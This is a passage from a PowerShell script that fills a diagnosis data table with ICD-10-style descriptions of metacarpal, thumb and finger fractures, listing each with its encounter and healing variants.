hand","Other fracture of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, right hand","Other fracture of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth metacarpal bone, left hand","Other fracture of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, right hand","Other fracture of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth metacarpal bone, left hand","Other fracture of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of other metacarpal bone","Other fracture of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified metacarpal bone","Other fracture of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right thumb","Fracture of unspecified phalanx of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left thumb","Fracture of unspecified phalanx of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of unspecified thumb","Fracture of unspecified phalanx of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right thumb","Displaced fracture of proximal phalanx of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left thumb","Displaced fracture of proximal phalanx of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified thumb","Displaced fracture of proximal phalanx of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right thumb","Nondisplaced fracture of proximal phalanx of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left thumb","Nondisplaced fracture of proximal phalanx of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified thumb","Nondisplaced fracture of proximal phalanx of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right thumb","Displaced fracture of distal phalanx of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left thumb","Displaced fracture of distal phalanx of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified thumb","Displaced fracture of distal phalanx of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right thumb","Nondisplaced fracture of distal phalanx of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left thumb","Nondisplaced fracture of distal phalanx of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified thumb","Nondisplaced fracture of distal phalanx of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right index finger","Fracture of unspecified phalanx of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left index finger","Fracture of unspecified phalanx of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right middle finger","Fracture of unspecified phalanx of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left middle finger","Fracture of unspecified phalanx of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right ring finger","Fracture of unspecified phalanx of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of left ring finger","Fracture of unspecified phalanx of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of unspecified phalanx of right little finger, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified phalanx of right little finger","Fracture of 